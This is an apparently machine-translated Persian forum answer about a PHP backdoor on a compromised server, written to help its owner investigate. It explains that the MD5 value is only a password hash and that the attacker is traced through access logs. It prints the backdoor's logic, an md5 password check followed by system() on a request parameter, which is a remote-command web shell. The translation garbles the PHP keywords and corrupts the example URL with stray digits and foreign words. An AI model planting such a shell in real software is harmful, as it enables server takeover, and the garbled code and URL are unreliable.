منتشرشده در encryption، malware، md5، php، virus، فیلتر شکن

آیا می توان هش md5 ​​را رمزگشایی کرد ، و بنابراین بدانید که کدام وب سایت مخرب از درهای پشتی سرور من استفاده می کند؟

در مورد امکان (در) امکان دستیابی به رمزگشایی هش md5 ​​به عنوان مثال در اینجا مراجعه کنید. به طور خلاصه: اگر ساده باشد می توانید آن را زور دهید ، اگر پیچیده باشد ، غیرقابل نفوذ خواهد بود.

اما حتی اگر بتوانید هش را رمزگشایی کنید: این شامل اطلاعات مورد نظر شما نیست ، یعنی اینکه بدانید چه کسی از پشتی استفاده می کند. در عوض ، این هش فقط هش رمزعبور است و اگر رمز عبور (پارامتر p ) با هش از پیش تعریف شده مطابقت ندارد ، کد اجرا نمی شود: 

 $ c = "2caf6917ca3d9a3a85d26029ed623b1a"؛
$ p = md5 (urldecode ($ _ تقاضا ["p"]))؛
اگر ($ p! = $ c) خارج شوید؛

دستور اجرای به جای آن در داخل پارامتر s است: 

 $ s = urldecode ($ _ REQUEST ["s"])؛
اگر ($ s == "") خارج شوید؛
سیستم ($ s)

اما حتی این به شما نمی گوید چه کسی از پشتی استفاده می کند بلکه فقط آنچه مهاجم انجام می دهد. برای به دست آوردن اطلاعات بیشتر در مورد مهاجم ، باید در واقع دسترسی به سرور خود را جستجو کنید. با خوشبختانه شما می توانید با مسیری مانند این ، درخواست هایی را به سایت خود بیابید: 

 /compromised.php؟p=roulette19459010պաներեն&s= موفق19459011]

از این ورود به سیستم رمزعبور و فرمان را دریافت می کنید و معمولاً آدرس IP مشتری که به URL دسترسی پیدا کرده است – یعنی آدرس IP عمومی مهاجم – دریافت می کنید. توجه داشته باشید که این مورد نیاز به آدرس IP واقعی مهاجمان نخواهد بود زیرا مهاجم می تواند از سیستم های دیگر (مانند بات نت) به عنوان میزبان پرش استفاده کند یا حتی می تواند این اقدام مخرب را به عنوان URL در برخی از سایت ها جاسازی کند ، جایی که توسط یک بازدید کننده بی گناه فراخوانی می شود. – اگرچه در این حالت مهاجمان بعید به نظر می رسد که خروجی فرمان را دریافت کند.

توجه داشته باشید که پارامترهای درخواست ممکن است به عنوان پارامترهای داخل درخواست POST ارسال شوند که در این حالت فقط دسترسی به اسکریپت PHP به خطر بیافتد اما پارامترها نیز مشاهده نمی شوند. در ورود به سیستم با این حال ، شما هنوز هم آدرس IP منبع را دارید و می دانید چه زمانی پشت در تماس گرفته شد. و ممکن است شما پشتیبان را خلع سلاح کنید (یعنی تماس با سیستم را غیرفعال کنید) و در عوض پارامترها را به این امید وارد کنید که مهاجم همچنان سعی در استفاده از پشتی داشته باشد.

تگ ها: